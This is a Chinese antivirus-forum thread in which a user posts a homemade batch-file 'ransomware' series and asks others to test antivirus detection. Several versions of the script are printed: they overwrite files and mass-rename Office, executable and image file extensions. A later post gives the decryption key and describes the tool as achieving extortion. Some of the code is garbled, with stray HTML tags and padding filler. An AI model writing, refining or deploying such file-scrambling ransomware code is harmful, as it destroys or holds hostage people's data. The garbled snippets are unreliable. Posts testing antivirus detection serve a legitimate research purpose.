查看: 2908|回复: 18
收起左侧

[病毒样本] 写了一个系列的勒索病毒(已更新第四代无bug)

[复制链接]
川建国代理人
发表于 2020-7-7 10:36:47 | 显示全部楼层 |阅读模式
本帖最后由 川建国代理人 于 2020-7-8 13:10 编辑

由本人及同学zjx两人共同探讨及编写了几个了一个bat,转成exe了
双击大概会使得文件夹内的所有文件的扩展名修改为txt,其他文件扩展名被修改成乱码
https://www.virustotal.com/gui/f ... af4ab28f3/detection
VT里5/58的引擎报毒
智量miss,已上报  各位测试一下杀软是否报毒,如果方便的话,希望在虚拟机里试试


仅限于加密同一个文件夹内的xls,xlsx,ppt,pptx,doc,docx,bat,exe
1.0 存在无法解密的问题。
2.0已解决,但是需要逐个双击程序使得文件恢复。
3.0可以实现一键加密上述文件,一键解密。
4.0可以加密更多类型的文件并无BUG解密,保证全部加密文件在输入密钥后解密
(前三代可能会有未能完全解密的情况出现,4.0已解决,4.0加密及解密详见17楼)

解密必须需要输入密钥,强行破解可能会使文件乱码
感谢各位测试,请提出你的意见,我将认思考你的想法,并对代码进行完善


1.0加密程序


  1. @echo
  2. <div><div>for /f "delims=" %%i in ('dir /s /b *.txt') do echo.>%%i.txt</div><div></div><div>
  3. </div><div>
  4. </div><div>
复制代码

2.0加密程序
  1. ::[Bat To Exe Converter]
  2. ::
  3. ::YAwzoRdxOk+EWAnk
  4. ::fBw5plQjdG8=
  5. ::YAwzuBVtJxjWCl3EqQJhSA==
  6. ::ZR4luwNxJguZRRnTpxphf0gMHWQ=
  7. ::Yhs/ulQjdF+5
  8. ::cxAkpRVqdFKZSDk=
  9. ::cBs/ulQjdF+5
  10. ::ZR41oxFsdFKZSDk=
  11. ::eBoioBt6dFKZSDk=
  12. ::cRo6pxp7LAbNWATEpCI=
  13. ::egkzugNsPRvcWATEpCI=
  14. ::dAsiuh18IRvcCxnZtBJQ
  15. ::cRYluBh/LU+EWAnk
  16. ::YxY4rhs+aU+JeA==
  17. ::cxY6rQJ7JhzQF1fEqQJQ
  18. ::ZQ05rAF9IBncCkqN+0xwdVs0
  19. ::ZQ05rAF9IAHYFVzEqQJQ
  20. ::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=
  21. ::fBEirQZwNQPfEVWB+kM9LVsJDGQ=
  22. ::cRolqwZ3JBvQF1fEqQJQ
  23. ::dhA7uBVwLU+EWDk=
  24. ::YQ03rBFzNR3SWATElA==
  25. ::dhAmsQZ3MwfNWATElA==
  26. ::ZQ0/vhVqMQ3MEVWAtB9wSA==
  27. ::Zg8zqx1/OA3MEVWAtB9wSA==
  28. ::dhA7pRFwIByZRRnk
  29. ::Zh4grVQjdCyDJGyX8VAjFDJyYD2wGUiGIrAP4/z0/9YDepmbozS5rWRTFUGypQvhbZEmO5M10xo=
  30. ::YB416Ek+ZG8=
  31. ::
  32. ::
  33. ::978f952a14a936cc963da21a135fa983
  34. ren *.*.* *.txt
复制代码

3.0加密程序
  1. ::[Bat To Exe Converter]
  2. ::
  3. ::YAwzoRdxOk+EWAnk
  4. ::fBw5plQjdG8=
  5. ::YAwzuBVtJxjWCl3EqQJhSA==
  6. ::ZR4luwNxJguZRRnTpxphf0gMHWQ=
  7. ::Yhs/ulQjdF+5
  8. ::cxAkpRVqdFKZSDk=
  9. ::cBs/ulQjdF+5
  10. ::ZR41oxFsdFKZSDk=
  11. ::eBoioBt6dFKZSDk=
  12. ::cRo6pxp7LAbNWATEpCI=
  13. ::egkzugNsPRvcWATEpCI=
  14. ::dAsiuh18IRvcCxnZtBJQ
  15. ::cRYluBh/LU+EWAnk
  16. ::YxY4rhs+aU+JeA==
  17. ::cxY6rQJ7JhzQF1fEqQJQ
  18. ::ZQ05rAF9IBncCkqN+0xwdVs0
  19. ::ZQ05rAF9IAHYFVzEqQJQ
  20. ::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=
  21. ::fBEirQZwNQPfEVWB+kM9LVsJDGQ=
  22. ::cRolqwZ3JBvQF1fEqQJQ
  23. ::dhA7uBVwLU+EWDk=
  24. ::YQ03rBFzNR3SWATElA==
  25. ::dhAmsQZ3MwfNWATElA==
  26. ::ZQ0/vhVqMQ3MEVWAtB9wSA==
  27. ::Zg8zqx1/OA3MEVWAtB9wSA==
  28. ::dhA7pRFwIByZRRnk
  29. ::Zh4grVQjdCyDJGyX8VAjFDJyYD2wGUiGIrAP4/z0/9YCSb+agCC5hG9cAVyypQvhbZEm82rNUaGyHSHMidS+MBeza28=
  30. ::YB416Ek+ZG8=
  31. ::
  32. ::
  33. ::978f952a14a936cc963da21a135fa983
  34. ren *.docx *.pptx
  35. ren *.doc *.ppt
  36. ren *.jpg *.xlsx
  37. ren *.exe *.txt
  38. ren *.bat *.xls
  39. ren *.xls *.jpg
  40. ren *.xlsx *.bat
复制代码







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
川建国代理人
 楼主| 发表于 2020-7-8 12:35:27 | 显示全部楼层
本帖最后由 川建国代理人 于 2020-7-8 12:38 编辑

最新版本(无BUG版勒索+解密新鲜出炉)
可加密同文件加内的pptx,docx,ppt,doc,jpg,bat,exe,xlsx,py,xls,dll,7zvbs,zip,ios,dat,log,rar,ps1,msi,psd,pyc,png,pdf以及一定的快捷方式
已进行虚拟机多次测试!
双击bat后,桌面文件被加密,双击解密程序后,将提示输入密钥解密,输入:
73817381
即可解密,达到了勒索的目的
如图一:双击前文件均可打开,未出现乱码
如图二:双击后文件乱码,后缀被改
如图三:打开解密exe后,提示输入密码
如图四:解密后,文件即可正常打开                             病毒代码尚不公布

样本和解密可见本贴附件(图片下方)

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
shineee
发表于 2020-7-7 10:49:07 | 显示全部楼层
由解密的方法吗?
欧阳宣
头像被屏蔽
发表于 2020-7-7 10:58:11 | 显示全部楼层
BEST
Gen:Illusion.ML.Skyline.9.1010101
狂欢...
发表于 2020-7-7 11:00:22 | 显示全部楼层
本帖最后由 狂欢... 于 2020-7-7 11:18 编辑

360+火绒,未拦截修改图标。360提示恢复图标

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
wangyuhe
发表于 2020-7-7 11:00:36 | 显示全部楼层
微步,anyrun判定无恶意,未见文件加密,可能是打开方式不对?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
川建国代理人
 楼主| 发表于 2020-7-7 11:02:54 | 显示全部楼层
本帖最后由 川建国代理人 于 2020-7-7 11:09 编辑

密码应该是73817381
我表达错了,是输入密码后可使文件乱码
密码是为了保证安全,防止手贱

救命稻草
发表于 2020-7-7 11:02:57 | 显示全部楼层
虚拟机双击,好像没文件被加密。
川建国代理人
 楼主| 发表于 2020-7-7 11:10:29 | 显示全部楼层
本帖最后由 川建国代理人 于 2020-7-7 11:13 编辑

我试了一下,桌面多了一些txt
其实可以再改进一下
  1. <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  2.   <assemblyIdentity
  3.     version="1.0.0.0"
  4.     processorArchitecture="X86"
  5.     name="CompanyName.ProductName.YourApp"
  6.     type="win32" />
  7.   <description></description>
  8.   <dependency>
  9.     <dependentAssembly>
  10.       <assemblyIdentity
  11.         type="win32"
  12.         name="Microsoft.Windows.Common-Controls"
  13.         version="6.0.0.0"
  14.         processorArchitecture="X86"
  15.         publicKeyToken="6595b64144ccf1df"
  16.         language="*" />
  17.     </dependentAssembly>
  18.   </dependency>

  19. </assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
复制代码



喀反
发表于 2020-7-7 12:35:58 | 显示全部楼层
wd kill

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
LSPD
发表于 2020-7-7 13:15:04 | 显示全部楼层
Norton 运行
DP拦载,没有文件被加密

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 16:12 , Processed in 0.155480 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表